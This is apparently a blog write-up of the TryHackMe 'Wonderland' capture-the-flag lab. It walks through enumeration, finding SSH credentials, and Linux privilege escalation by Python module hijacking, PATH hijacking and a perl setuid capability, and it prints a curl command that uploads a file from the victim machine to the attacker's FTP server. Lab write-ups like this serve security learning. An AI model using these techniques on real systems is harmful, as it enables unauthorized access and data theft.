Wonderland CTF from TryHackMe!
5 min readNov 12, 2020
This CTF worth a write up as it was a bit of a challenge for me.
- So as always I start off by scanning the target machine via Nmap.
2. Enumeration. I like to run dirb and dirbuster for enumerating an available directory.
- from the results of enumeration, it’s showing some directories for both dirb and dirbuster such as /img, r/, r/a
- /img directory:
- checking all the directory /r, /a which tell us to keep going which made you think which way to go. Analyzing all the available images and directories content this one stands out:
- following the r/a/b/b/i/t directories
- and by examining the Page Source, it revealed which seems to be a user’s credential.
- this credential can be used logging into ssh. SSH was open during our nmap scanning earlier.
3. Gaining Access. Now that we have a user credential we can use it gaining access to the target system.
- and SWEET! Now we have gained access to the target machine.
- now we look around to find interesting file that leads us to get the flag.
- we saw root.txt but its own by root and belongs to group root and obviously, we don’t have any permission.
- now we run the command sudo -l to show the allowed command for the user Alice.
- the result tells us that the “User alice may run the following commands on wonderland: (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py — → which means we can run this python command with user rabbit
- so lets execute it, sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
- whenever running the command with sudo rabbit user it throws up some random poem.
- it looks like the python script is throwing it randomly ( with random module imported in python) as shown by cat’ng the walrus_and_the_carpenter.py script:
- at this stage we can create a script instead of the script — walrus_and_the_carpenter.py calling the real random module, we created a malicious random.py that would execute /bin/bash and give us rabbit user shell.
- SWEET! now we have escalated to rabbit user.
- navigating to /home/rabbit directory revealed a SUID file or searching the whole directory find / -perm -u=s -type f 2>/dev/null. One stand out is the teaParty:
- this is how the script looks like when executed
- we may need to check the actual code with strings command (or alike), however it looks like a binary file:
- from my host machine I was running an FTP server (VSFTP)
- then from the victim machine. I then uploaded the file teaParty file to my host machine to examine its content using the strings command.
rabbit@wonderland:/home/rabbit$ curl -T ./teaParty ftp://10.x.x.x — user user:secret
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 16816 0 0 100 16816 0 3191 0:00:05 0:00:05 — : — : — 3793
- we see from the file that the “date” (os command) is executed without absolute path. This can be abused by exporting our own created $PATH. Writing a small script called date.
- real date path is /bin/date, would then create a new PATH in /tmp
- now the shell will look into /tmp folder first running the command without an absolute PATH such as the one we created — date (below). /tmp directory is a good candidate as it’s a directory usually open permission to all u+g+o.
- now we have escalated to hatter user. Gotta look around for interesting files, just like in /home/hatter directory
- with the password revealed we can ssh using the user name hatter:
- next thing I needed was to escalate my privilege. This time I used the linpeas.sh (Linux Privilege Escalation Awesome Script) for enumeration of possible exploit.
- to download the script from my attacker machine to the target machine. I ran a simple python HTTP Server from the target machine and downloaded the file from the target machine.
- one of the interesting result was below. If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID. Click here for reference.
- then executing the one-liner command for perl to gain root access.
- CTF SOLVED!!!